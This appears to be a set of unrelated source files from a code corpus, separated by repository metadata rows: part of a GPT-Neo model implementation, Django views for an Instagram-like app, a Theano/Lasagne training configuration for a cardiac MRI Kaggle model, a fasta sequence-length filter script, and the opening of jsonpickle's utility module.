passed as ``input_ids``.
Indices can be obtained using :class:`~transformers.GPTNeoTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
past_key_values (:obj:`Tuple[Tuple[torch.Tensor]]` of length :obj:`config.num_layers`):
Contains precomputed hidden-states (key and values in the attention blocks) as computed by the model (see
:obj:`past_key_values` output below). Can be used to speed up sequential decoding. The ``input_ids`` which
have their past given to this model should not be passed as ``input_ids`` as they have already been
computed.
attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
token_type_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, input_ids_length)`, `optional`):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0,
1]``:
- 0 corresponds to a `sentence A` token,
- 1 corresponds to a `sentence B` token.
`What are token type IDs? <../glossary.html#token-type-ids>`_
position_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`):
Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert :obj:`input_ids` indices into associated
vectors than the model's internal embedding lookup matrix.
If :obj:`past_key_values` is used, optionally only the last :obj:`inputs_embeds` have to be input (see
:obj:`past_key_values`).
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned
tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for
more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
@add_start_docstrings(
"The bare GPT Neo Model transformer outputting raw hidden-states without any specific head on top.",
GPT_NEO_START_DOCSTRING,
)
class GPTNeoModel(GPTNeoPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.embed_dim = config.hidden_size
self.wte = nn.Embedding(config.vocab_size, self.embed_dim)
self.wpe = nn.Embedding(config.max_position_embeddings, self.embed_dim)
self.drop = nn.Dropout(config.embed_dropout)
self.h = nn.ModuleList([GPTNeoBlock(config, layer_id=i) for i in range(config.num_layers)])
self.ln_f = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon)
self.init_weights()
def get_input_embeddings(self):
return self.wte
def set_input_embeddings(self, new_embeddings):
self.wte = new_embeddings
@add_start_docstrings_to_model_forward(GPT_NEO_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPastAndCrossAttentions,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
batch_size = input_ids.shape[0]
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
batch_size = inputs_embeds.shape[0]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if token_type_ids is not None:
token_type_ids = token_type_ids.view(-1, input_shape[-1])
if position_ids is not None:
position_ids = position_ids.view(-1, input_shape[-1])
if past_key_values is None:
# print("!!!past_key_values is None!!!")
past_length = 0
past_key_values = tuple([None] * len(self.h))
else:
past_length = past_key_values[0][0].size(-2)
device = input_ids.device if input_ids is not None else inputs_embeds.device
if position_ids is None:
position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
# Attention mask.
if attention_mask is not None:
assert batch_size > 0, "batch_size has to be defined and > 0"
global_attention_mask = attention_mask.view(batch_size, -1)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
global_attention_mask = global_attention_mask[:, None, None, :]
# Since global_attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
global_attention_mask = global_attention_mask.to(dtype=self.dtype) # fp16 compatibility
global_attention_mask = (1.0 - global_attention_mask) * -10000.0
else:
global_attention_mask = None
# Local causal attention mask
batch_size, seq_length = input_shape
full_seq_length = seq_length + past_length
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x num_heads x N x N
# head_mask has shape n_layer x batch x num_heads x N x N
head_mask = self.get_head_mask(head_mask, self.config.num_layers)
if inputs_embeds is None:
inputs_embeds = self.wte(input_ids)
position_embeds = self.wpe(position_ids)
hidden_states = inputs_embeds + position_embeds
if token_type_ids is not None:
token_type_embeds = self.wte(token_type_ids)
hidden_states = hidden_states + token_type_embeds
hidden_states = self.drop(hidden_states)
output_shape = input_shape + (hidden_states.size(-1),)
presents = () if use_cache else None
all_self_attentions = () if output_attentions else None
all_hidden_states = () if output_hidden_states else None
for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)):
attn_type = self.config.attention_layers[i]
attn_mask = global_attention_mask
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if getattr(self.config, "gradient_checkpointing", False) and self.training:
if use_cache:
logger.warning(
"`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting "
"`use_cache=False`..."
)
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, use_cache, output_attentions)
return custom_forward
outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(block),
hidden_states,
None,
attn_mask,
head_mask[i],
)
else:
try:
outputs = block(
hidden_states,
layer_past=layer_past,
attention_mask=attn_mask,
head_mask=head_mask[i],
use_cache=use_cache,
output_attentions=output_attentions,
)
except AfterStoppingPointException as e:
raise e
except Exception as e:
print("failed with:")
print(f"\t block {i}")
print(f"\t input_ids.shape {input_ids.shape}")
print(f"\t hidden_states.shape {hidden_states.shape}")
print(f"\t past shapes {layer_past[0].shape if layer_past else layer_past}")
raise e
hidden_states = outputs[0]
if use_cache is True:
presents = presents + (outputs[1],)
if output_attentions:
all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],)
hidden_states = self.ln_f(hidden_states)
hidden_states = hidden_states.view(*output_shape)
# Add last hidden state
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, presents, all_hidden_states, all_self_attentions] if v is not None)
return BaseModelOutputWithPast(
last_hidden_state=hidden_states,
past_key_values=presents,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
)
@add_start_docstrings(
"""
The GPT Neo Model transformer with a language modeling head on top (linear layer with weights tied to the input
embeddings).
""",
GPT_NEO_START_DOCSTRING,
)
class GPTNeoForCausalLM(GPTNeoPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.masked_bias", r"lm_head\.weight"]
_keys_to_ignore_on_save = [r"lm_head.weight"]
def __init__(self, config):
super().__init__(config)
self.transformer = GPTNeoModel(config)
self.lm_head = LazyLinearAPICompatible(config.hidden_size, config.vocab_size, bias=False)
self.init_weights()
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def prepare_inputs_for_generation(self, input_ids, past=None, **kwargs):
token_type_ids = kwargs.get("token_type_ids", None)
# only last token for inputs_ids if past is defined in kwargs
if past:
input_ids = input_ids[:, -1].unsqueeze(-1)
if token_type_ids is not None:
token_type_ids = token_type_ids[:, -1].unsqueeze(-1)
attention_mask = kwargs.get("attention_mask", None)
position_ids = kwargs.get("position_ids", None)
if attention_mask is not None and position_ids is None:
# create position_ids on the fly for batch generation
position_ids = attention_mask.long().cumsum(-1) - 1
position_ids.masked_fill_(attention_mask == 0, 1)
if past:
position_ids = position_ids[:, -1].unsqueeze(-1)
else:
position_ids = None
return {
"input_ids": input_ids,
"past_key_values": past,
"use_cache": kwargs.get("use_cache"),
"position_ids": position_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
}
@add_start_docstrings_to_model_forward(GPT_NEO_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=CausalLMOutputWithCrossAttentions,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
``labels = input_ids`` Indices are selected in ``[-100, 0, ..., config.vocab_size]`` All labels set to
``-100`` are ignored (masked), the loss is only computed for labels in ``[0, ..., config.vocab_size]``
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = transformer_outputs[0]
lm_logits = self.lm_head(hidden_states)
loss = None
if labels is not None:
# Compute loss in fp32 to match with mesh-tf version
# https://github.com/EleutherAI/gpt-neo/blob/89ce74164da2fb16179106f54e2269b5da8db333/models/gpt2/gpt2.py#L179
lm_logits = lm_logits.to(torch.float32)
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
shift_labels = labels[..., 1:].contiguous()
# Flatten the tokens
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
lm_logits = lm_logits.to(hidden_states.dtype)
loss = loss.to(hidden_states.dtype)
if not return_dict:
output = (lm_logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return CausalLMOutputWithPast(
loss=loss,
logits=lm_logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
@staticmethod
def _reorder_cache(past: Tuple[Tuple[torch.Tensor]], beam_idx: torch.Tensor) -> Tuple[Tuple[torch.Tensor]]:
"""
This function is used to re-order the :obj:`past_key_values` cache if
:meth:`~transformers.PretrainedModel.beam_search` or :meth:`~transformers.PretrainedModel.beam_sample` is
called. This is required to match :obj:`past_key_values` with the correct beam_idx at every generation step.
"""
return tuple(
tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past)
for layer_past in past
)
| 41.982206 | 130 | 0.641886 | [
"MIT"
] | Snarp/nostalgebraist-autoresponder | src/stable_library_code/transformers/gpt_neo/modeling_gpt_neo.py | 35,391 | Python |
from django.http.response import HttpResponseRedirect
from django.shortcuts import redirect, render
from django.contrib.auth.decorators import login_required
from itertools import chain
from .models import Image, Profile, Comment
from .forms import NewProfileForm, NewImageForm
import string
import random
# Create your views here.
def generateNewName():
letters = string.ascii_letters
numbers = string.digits
specialCharacters = string.punctuation
acceptablePasswordCharacters = letters + numbers + specialCharacters
generatedPassword = "".join(random.choice(acceptablePasswordCharacters) for i in range(8))
# print("Your generared password is: " +generatedPassword)
return generatedPassword
@login_required(login_url='/accounts/login/')
def index(request):
title = 'Moments: Feed'
current_user = request.user
current_profile = Profile.objects.filter(user_name = current_user.username).first()
if current_profile:
all_posts = list()
users_posts = Image.objects.filter(profile_id = current_profile).all()
user_posts_count = users_posts.count()
folowing_count = len(current_profile.following)
if folowing_count >= 0:
all_following_post = list()
for item in current_profile.following:
following_posts = Image.objects.filter(profile_id = item).all()
all_following_post.append(following_posts)
all_posts = list(chain(users_posts, all_posts))
return render(request, 'dashboard.html', {'title': title, 'all_posts': all_posts, "profile": current_profile, 'post_count': user_posts_count})
else:
return redirect('Create Profile')
@login_required(login_url='/accounts/login/')
def upload(request):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
form = NewImageForm(request.POST, request.FILES)
if request.method == 'POST' and request.FILES['new_image']:
if form.is_valid():
new_post = request.FILES['new_image']
new_caption = form.cleaned_data['image_caption']
new_upload = Image(image = new_post, image_name = generateNewName(), image_caption = new_caption, profile_id = current_profile, likes = 0,)
new_upload.save()
return redirect('Dashboard')
else:
form = NewImageForm()
return render(request, 'upload.html', {'title': title, 'form': form, "profile": current_profile })
@login_required(login_url='/accounts/login/')
def create_profile(request):
title = 'Moments: Create New Profile'
form = NewProfileForm(request.POST, request.FILES)
current_profile = Profile.objects.filter(user_name = request.user.username).first()
if request.method == 'POST' and request.FILES['profile_photo']:
if form.is_valid():
new_profile_photo = request.FILES['profile_photo']
new_bio = form.cleaned_data['bio']
print(new_bio)
username = request.user.username
date_joined = request.user.date_joined
new_profile = Profile(profile_photo= new_profile_photo, bio=new_bio, user_name= username, following= [], followers = [], joined= date_joined)
new_profile.save()
return redirect('Dashboard')
else:
form = NewProfileForm()
return render(request, 'create_profile.html', {'title': title, 'form': form, "profile": current_profile})
@login_required(login_url='/accounts/login/')
def profile(request):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
user_posts = Image.objects.filter(profile_id = current_profile).all
return render(request, 'profile.html', {'title': title, 'profile': current_profile, 'posts': user_posts})
@login_required(login_url='/accounts/login/')
def view_profile(request, user_id):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
found_user = Profile.objects.filter(id = user_id).first()
user_posts = Image.objects.filter(profile_id = found_user).all()
return render(request, 'view_profile.html', {'title': title, 'profile': current_profile, 'user_profile': found_user, 'posts': user_posts})
@login_required(login_url='/accounts/login/')
def search(request):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
if 'search' in request.GET and request.GET['search']:
search_query = request.GET.get('search')
print(search_query)
found_users = Profile.objects.filter(user_name = search_query).all()
return render(request, 'search.html', {'title': title, 'profile': current_profile, 'search_query': search_query, 'results': found_users})
return render(request, 'search.html', {'title': title, 'profile': current_profile})
@login_required(login_url='/accounts/login/')
def view(request, post_id):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
found_image = Image.objects.filter(id = post_id).first()
image_comments = Comment.objects.filter(image_id = found_image.id ).all()
return render(request, 'view.html', {'title': title, 'post': found_image, "profile": current_profile, 'comments': image_comments}) | 36.980645 | 153 | 0.666957 | [
"MIT"
] | g90tony/insta-clone | image/views.py | 5,732 | Python |
"""Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
# Random params
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
# Memory usage scheme
caching = None
# Save and validation frequency
validate_every = 10
validate_train_set = True
save_every = 10
restart_from_save = False
dump_network_loaded_data = False
# Training (schedule) parameters
# - batch sizes
batch_size = 32
sunny_batch_size = 4
batches_per_chunk = 16
AV_SLICE_PER_PAT = 11
num_epochs_train = 50 * AV_SLICE_PER_PAT
# - learning rate and method
base_lr = .0001
learning_rate_schedule = {
0: base_lr,
num_epochs_train*4/5: base_lr/10,
num_epochs_train*19/20: base_lr/100,
}
momentum = 0.9
build_updates = updates.build_adam_updates
# Preprocessing stuff
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-16, 16),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
}
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(200,200)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Data generators
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
# Input sizes
image_size = 128
data_sizes = {
"sliced:data:singleslice:difference:middle": (batch_size, 29, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:singleslice:difference": (batch_size, 29, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:singleslice": (batch_size, 30, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:ax": (batch_size, 30, 15, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, image_size, image_size)
# TBC with the metadata
}
# Objective
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
# Testing
postprocess = postprocess.postprocess
test_time_augmentations = 20 * AV_SLICE_PER_PAT # More augmentations since a we only use single slices
tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
# Architecture
def build_model():
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:singleslice"]
l0 = nn.layers.InputLayer(input_size)
l1a = nn.layers.dnn.Conv2DDNNLayer(l0, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=64, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l1b = nn.layers.dnn.Conv2DDNNLayer(l1a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=64, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l1 = nn.layers.dnn.MaxPool2DDNNLayer(l1b, pool_size=(2,2), stride=(2,2))
l2a = nn.layers.dnn.Conv2DDNNLayer(l1, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=128, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l2b = nn.layers.dnn.Conv2DDNNLayer(l2a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=128, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l2 = nn.layers.dnn.MaxPool2DDNNLayer(l2b, pool_size=(2,2), stride=(2,2))
l3a = nn.layers.dnn.Conv2DDNNLayer(l2, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3b = nn.layers.dnn.Conv2DDNNLayer(l3a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3c = nn.layers.dnn.Conv2DDNNLayer(l3b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3 = nn.layers.dnn.MaxPool2DDNNLayer(l3c, pool_size=(2,2), stride=(2,2))
l4a = nn.layers.dnn.Conv2DDNNLayer(l3, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4b = nn.layers.dnn.Conv2DDNNLayer(l4a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4c = nn.layers.dnn.Conv2DDNNLayer(l4b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4 = nn.layers.dnn.MaxPool2DDNNLayer(l4c, pool_size=(2,2), stride=(2,2))
l5a = nn.layers.dnn.Conv2DDNNLayer(l4, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5b = nn.layers.dnn.Conv2DDNNLayer(l5a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5c = nn.layers.dnn.Conv2DDNNLayer(l5b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5 = nn.layers.dnn.MaxPool2DDNNLayer(l5c, pool_size=(2,2), stride=(2,2))
# Systole Dense layers
ldsys1 = nn.layers.DenseLayer(l5, num_units=512, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
ldsys1drop = nn.layers.dropout(ldsys1, p=0.5)
ldsys2 = nn.layers.DenseLayer(ldsys1drop, num_units=512, W=nn.init.Orthogonal("relu"),b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
ldsys2drop = nn.layers.dropout(ldsys2, p=0.5)
ldsys3 = nn.layers.DenseLayer(ldsys2drop, num_units=600, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.softmax)
ldsys3drop = nn.layers.dropout(ldsys3, p=0.5) # dropout at the output might encourage adjacent neurons to correllate
ldsys3dropnorm = layers.NormalisationLayer(ldsys3drop)
l_systole = layers.CumSumLayer(ldsys3dropnorm)
# Diastole Dense layers
lddia1 = nn.layers.DenseLayer(l5, num_units=512, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
lddia1drop = nn.layers.dropout(lddia1, p=0.5)
lddia2 = nn.layers.DenseLayer(lddia1drop, num_units=512, W=nn.init.Orthogonal("relu"),b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
lddia2drop = nn.layers.dropout(lddia2, p=0.5)
lddia3 = nn.layers.DenseLayer(lddia2drop, num_units=600, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.softmax)
lddia3drop = nn.layers.dropout(lddia3, p=0.5) # dropout at the output might encourage adjacent neurons to correllate
lddia3dropnorm = layers.NormalisationLayer(lddia3drop)
l_diastole = layers.CumSumLayer(lddia3dropnorm)
return {
"inputs":{
"sliced:data:singleslice": l0
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
},
"regularizable": {
ldsys1: l2_weight,
ldsys2: l2_weight,
ldsys3: l2_weight_out,
lddia1: l2_weight,
lddia2: l2_weight,
lddia3: l2_weight_out,
},
}
| 46.165803 | 176 | 0.715937 | [
"MIT"
] | Keesiu/meta-kaggle | data/external/repositories_2to3/267667/kaggle-heart-master/configurations/je_ss_smcrps_nrmsc200_500_dropnorm.py | 8,910 | Python |
#!/usr/bin/env python
## Filter small sequences out of a fasta file. For use with flies,
## for example, where scaffolds of length <200kb seem to be considered
## no mans land
import os
from optparse import OptionParser
from sonLib.bioio import fastaRead
from sonLib.bioio import fastaWrite
from sonLib.bioio import getTempFile
# for every sequence, determine if its contained in the file
# (starts with |1|0; and there is a differently named sequence after it),
# and its length (defined as the max offset + length) found for the name
# assumption: sequences with same name are contiguous (which is true for
# cactus_batchChunk output, which this is tailored for)
# **only bother if names seem to be in chunk format (None returned otherwise)
def containedSequences(inputFile):
lookup = dict()
prev = ""
for header, seq in fastaRead(inputFile):
if '|1|' not in header:
assert len(lookup) == 0
return None
else:
idx = header.find('|1|')
name = header[:idx]
offset = header[idx+3:]
if offset.isdigit() == False:
assert len(lookup) == 0
return None
if int(offset) == 0:
assert lookup.has_key(name) == False
lookup[name] = (len(seq), False)
elif lookup.has_key(name) == True:
lookup[name] = (max(lookup[name][0], int(offset) + len(seq)), lookup[name][1])
if name != prev and lookup.has_key(prev):
lookup[prev] = (lookup[prev][0], True)
prev = name
return lookup
def tooShort(header, seq, options, contTable):
isTooShort = False
if contTable is not None:
key = header[:header.find('|1|')]
if contTable.has_key(key):
length, flag = contTable[key]
isTooShort = flag and length < options.length
else:
isTooShort = len(seq) < options.length
return isTooShort
def main():
##########################################
#Construct the arguments.
##########################################
usage = "usage: %prog [options] <fasta input file> <fasta output file>\n\n" + \
" <fasta file>: fasta sequence to filter\n"
description = "Ensure sequences have length >= length\n"
parser = OptionParser(usage=usage, description=description)
parser.add_option("--prefix", dest="prefix", type="string",
help="only filter sequences with prefix in name",
default="")
parser.add_option("--length", dest="length", type="int",
help="filter shorter than length [default=1000]",
default=1000)
options, args = parser.parse_args()
if len(args) != 2:
parser.print_help()
return 1
inputName = args[0]
inputFile = open(inputName, "r")
outputName = args[1]
outputFile = open(outputName, "w")
contTable = containedSequences(inputFile)
inputFile.seek(0)
for header, seq in fastaRead(inputFile):
if tooShort(header, seq, options, contTable) == False:
fastaWrite(outputFile, header, seq)
outputFile.close()
inputFile.close()
return 0
if __name__ == '__main__':
exit(main())
| 33.79798 | 94 | 0.582188 | [
"MIT-0"
] | adf-ncgr/cactus | preprocessor/cactus_filterSmallFastaSequences.py | 3,346 | Python |
# Copyright (C) 2008 John Paulett (john -at- paulett.org)
# Copyright (C) 2009-2018 David Aguilar (davvid -at- gmail.com)
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
"""Helper functions for pickling and unpickling. Most functions assist in
determining the type of an object.
"""
from __future__ import absolute_import, division, unicode_literals
import base64
import collections
import io
import operator
import sys
import time
import types
import inspect
from . import tags
from . import compat
from .compat import (
abc_iterator,
class_types,
iterator_types,
numeric_types,
PY2,
PY3,
PY3_ORDERED_DICT,
)
if PY2:
import __builtin__
SEQUENCES = (list, set, tuple)
SEQUENCES_SET = {list, set, tuple}
PRIMITIVES = {compat.ustr, bool, type(None)} | set(numeric_types)
NON_REDUCIBLE_TYPES = {
int,
float,
list,
dict,
set,
tuple,
object,
bytes,
types.FunctionType,
types.MethodType,
types.LambdaType,
types.BuiltinFunctionType,
types.BuiltinMethodType,
} | PRIMITIVES
def is_type(obj):
"""Returns True is obj is a reference to a type.
>>> is_type(1)
False
>>> is_type(object)
True
>>> class Klass: pass
>>> is_type(Klass)
True
"""
# use "isinstance" and not "is" to allow for metaclasses
return isinstance(obj, class_types)
def has_method(obj, name):
# false if attribute doesn't exist
if not hasattr(obj, name):
return False
func = getattr(obj, name)
# builtin descriptors like __getnewargs__
if isinstance(func, types.BuiltinMethodType):
return True
# note that FunctionType has a different meaning in py2/py3
if not isinstance(func, (types.MethodType, types.FunctionType)):
return False
# need to go through __dict__'s since in py3
# methods are essentially descriptors
# __class__ for old-style classes
base_type = obj if is_type(obj) else obj.__class__
original = None
# there is no .mro() for old-style classes
for subtype in inspect.getmro(base_type):
original = vars(subtype).get(name)
if original is not None:
break
# name not found in the mro
if original is None:
return False
# static methods are always fine
if isinstance(original, staticmethod):
return True
# at this point, the method has to be an instancemthod or a classmethod
self_attr = '__self__' if PY3 else 'im_self'
if not hasattr(func, self_attr):
return False
bound_to = getattr(func, self_attr)
# class methods
if isinstance(original, classmethod):
return issubclass(base_type, bound_to)
# bound methods
return isinstance(obj, type(bound_to))
def is_object(obj):
"""Returns True is obj is a reference to an object instance.
>>> is_object(1)
True
>>> is_object(object())
True
>>> is_object(lambda x: 1)
False
"""
return isinstance(obj, object) and not isinstance(
obj, (type, types.FunctionType, types.BuiltinFunctionType)
)
def is_primitive(obj):
"""Helper method to see if the object is a basic data type. Unicode strings,
integers, longs, floats, booleans, and None are considered primitive
and will return True when passed into *is_primitive()*
>>> is_primitive(3)
True
>>> is_primitive([4,4])
False
"""
return type(obj) in PRIMITIVES
def is_enum(obj):
"""Is the object an enum?"""
